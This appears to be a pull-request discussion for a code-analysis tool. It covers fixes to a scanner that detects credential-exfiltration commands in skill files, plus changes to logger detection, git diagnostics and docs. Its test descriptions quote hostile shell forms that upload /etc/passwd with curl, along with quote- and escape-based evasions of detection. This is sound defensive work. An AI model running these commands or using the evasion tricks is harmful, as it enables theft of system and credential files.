Follow-up to train 22: scanner quoting, logger recall, multi-root diagnostics, docs - #367
Conversation
`cat "/etc/passwd" | curl --data-binary @- URL` scanned clean while the unquoted form is CRITICAL: punctuation() re-armed command position at every spaced opening quote, so a reader's quoted file became the segment's command and noteRead never ran. A quote no longer re-arms inside a reader's segment (elsewhere it still may open a nested command: `sh -c "…"`, `echo "…" | sh`), and netFlow reads a shell word split by quotes or backslash escapes (`/etc/"passwd"`, `@"/etc/passwd"`, `/etc/pass\wd`) whole as well as piece by piece, so nothing a piece matched is lost. test/skillscan.sh check 20: 13 quoted arms + a non-sensitive control; 10 red on e936826, all green here. Multiset compare vs e936826 over test/skillfix, the 0.6.6 adversarial review set and this repo's md/script files (1741 files): no row lost, no exit code lowered, no .md output changed without a new row; two CRITICAL probe rows gain why="sensitive-read-upload" (same severity). … clone --hotspots, --cochange and --owners mine every workspace root, but their failure paths asked only the primary root whether it was shallow, so a full primary + a shallow secondary with nothing mineable said "git unavailable". minedRootShallowCause() is the failure-path twin of anyMinedRootShallow(): the first mined root (the symbol's root for --owners=SYM) with a shallow-history cause, prefixed with that root on a multi-root run. test/shallowhistorycheck.sh 3m: full+shallow workspace whose commits touch only notes.txt -> --cochange/--owners refuse naming the shallow clone (red on e936826: "git unavailable"); full+full control keeps "git unavailable". The --hotspots path gets the same probe; its multi-root failure branch is not reachable from this fixture (a shallow root with any commit yields churn), so no hotspots arm. … nothing docs/LIMITS.md listed kMentionsNameMaxDepth unclassified with no note. mentionsNameBelow answers "mentions it" for a subtree deeper than 512 levels, so handlerShape never tags such a handler log-only and --quality-delta's error-masking cannot find it: a silent miss, never a false finding. The declaration now says so (the note the generator reads), docs/limits_classes.tsv classifies it INDEXING, and docs/LIMITS.md is regenerated by docs/limits_build.py (128 of 230 caps classified). An emitted disclosure is deferred: it needs a new attribute plumbed from handlershape.h to the quality answers and their legends, for a nesting depth no real handler reaches. …stray family heading, eleven-kind legends
- --impact: the help description repeated "transitive blast radius" after the summary; it now continues the
summary ("— the indexed symbols that reach SYM …"). The capture's --impact block predated d=/by_depth=; it is
corrected in place with this binary's own output on this tree (the recorder was not run).
- --mentions: docs_commands_build.py appended every four-space non-flag help line to the flag above it, so the
"the pre-PR family — plumbing (--affected) … (--test-gate):" sub-heading sat in --mentions' prose (and the
counts_floor= row in --impact's). classifyHelpLine() gives such a line its own row; the generator now ends the
entry there. Side effect: the "Shaped by" lists drop the links those misattributed lines invented.
- --quality-delta: the description restated the summary; it now reads "— pair with --test-gate. Each kind is
measured against the baseline (…)". The capture's six embedded legends said TEN KINDS without placeholder;
corrected to the binary's ELEVEN KINDS wording (kQdLegendCore).
COMMANDS.md regenerated with python3 docs/docs_commands_build.py --bin build/ripwire.

…depth-order comment - ingest_names.h bindsOutsideItsFunction: ts_node_parent( roleNode ) is checked with ts_node_is_null before ts_node_type reads it (a root-level node has no parent; the empty-kind short circuit is kept). - mcp.h tools/list filter: ASSUME the stanza's name string is closed (nameEnd != npos) before the substring; the input is this file's own output, so ASSUME (not VALIDATE) as for the opening prefix. - verbs_navigate.h: orderByDepthThenRank sorts ascending depth, so the comment now says the nearest rows go first. … words join in ShellWordJoin --quality-delta gated on 29a1cea: NetFlowScan::word gained two parameters (api-surface) and complexity 16 -> 22. The whole-word read is its own step (wholeWord), and netFlow's joining moved to ShellWordJoin; behaviour unchanged (test/skillscan.sh ALL PASS). …l, an acronym or a digit isLogReceiver's whole-word rule (round 1) split only on _ - and camelCase, so logging.getLogger(__name__), get_logger(), structlog.get_logger(), self.get_logger(), @logger, @log, $logger, this.#logger, this.HTTPLogger, log4js.getLogger(), HTTPLogger, DBLogger, logger2, mylog, vlog, logfire, logbook and structlog fell out, and Python's gating rows with them. Trailing balanced call arguments come off before the last dot segment; words split on every non-alphanumeric byte, at acronym-to-word and at letter-to-digit; isLogWord also takes a one-word logger package (structlog, logfire, logbook, loguru) and log/logger/logging behind a one- or two-letter alphabetic prefix other than b. catalog, dialog, backlog, changelog, analog, technology, blog stay out. qualitykindscheck 5l second pass: 20 positive arms (Python gating; Ruby/TS/Java minor) red on e936826, green here; 10 negative arms green on both. …and as the command it names Review of 8df82d8. M1: netFlow re-read the joined word for every piece (ShellWordJoin::add compared and wholeWord rescanned the word so far), so one word cut into k pieces cost k squared: 168 s for a 384 KB line, a stall for --scan-skill(s) and wrap on a hostile SKILL.md. The word is now assembled once and read once, when it ends (ShellWordJoin::continuesAt). M2: the whole word took redirectIn=false, so '< /etc/"passwd"' read nothing; the word's start state (prev token, redirect, command position) is captured at its first piece. M3: a command NAME split by quotes or an escape (\cat, c"a"t, /bin/c"a"t, \curl, c"url") was never the command, on main too; in command position the whole word is now noted as the command, or as a runner prefix that leaves the next word the command. Pieces are still classified one by one, so this only adds. test/skillscan.sh check 20: 8 new arms red on 8df82d8 (and main), green; a linear-time arm (32k vs 8k glued pieces, pass under 6x or 1 s) red on 8df82d8 at 12.8x / 9.97 s, green at 2.8x / 0.06 s. CHANGELOG: the skill-scan entry now names command words and redirects; the log-receiver entry says clog/flog/clogging count and only LONGER English -log words and blog stay out (review S2). … a value or a flag Review of 70e0d41, N1: wholeWord re-judged a split word in command position from the state its LAST piece left, so `sudo -u ro''ot cat`, `env -u "PA"TH curl`, `timeout -s "KI"LL 5 cat`, `xargs -I "{"} curl` and `sudo "-"u root cat` made the value (or the flag's tail) the command and the real command an argument; main misses them too. WordStart now also saves skipValue and activePrefix, and wholeWord restores them (with expectCommand) before prefixWord judges the whole word. test/skillscan.sh check 20: 5 arms red on 70e0d41, green; linear-time arm still 2.7x / 0.06 s. Review comments at @src/handlershape.h:
- Line 481: Update the parenthesis scan used by withoutTrailingCalls so
parentheses inside quoted arguments, including escaped quotes, do not affect
call-boundary matching; alternatively, use the parsed call boundary to remove
arguments. Keep isLogReceiver matching based on the actual receiver and add
regression cases for unmatched closing and opening parentheses inside arguments.
Review comments at @src/skillscan.h:
- Line 593: Update the quote-handling logic around runsQuote so reader state is
scoped to the current command context rather than inherited by nested commands;
ensure the nested sh -c command is scanned and sets segNet for the upload. Add
the process-substitution example as a regression fixture.
- Line 780: Update the `wholeWord` handling so the fully reconstructed word
remains available as the previous token after `join.whole.clear()`, preserving
its original case for options such as `-T`; add a split `--upload-file` case to
the regression fixture and verify the following operand triggers the existing
upload-option check.
Review comments at @src/verbs_navigate.h:
- Line 2407: Update the ordering used by orderByDepthThenRank before pagination
to use a total, canonical content-based tie-break that distinguishes overloads,
or use exact integer ranking for the tie-break; do not rely on NodeId or
g.canonId alone.

…on precedes its file PR #367 review. 4153226359: the quote re-arm read the SEGMENT's reader state, so in `cat <(sh -c 'curl … @/etc/passwd URL')` (and `cat $(sh -c …)`) the outer cat kept sh's quoted script from being read as a command and the upload went unseen; main caught both (an invariant break of this lane). The re-arm now reads cmdReader, the current command's own reader state, saved and restored around each `(`/`<(`/`$(`/backtick context, so `cat <(…) "/etc/passwd"` is still cat's read. segReader (read operands) is unchanged. 4153226363: after a split word, prevToken held only its last piece, so `curl --upload-""file /etc/passwd` and `-""T` missed the upload option; the word as written (case kept) is now the next word's prevToken, from a two-buffer ShellWordJoin. test/skillscan.sh check 20: 4 arms red on ce097b4, plus a guard (`cat <(true) "/etc/passwd"`) green on both; linear-time arm 2.9x.
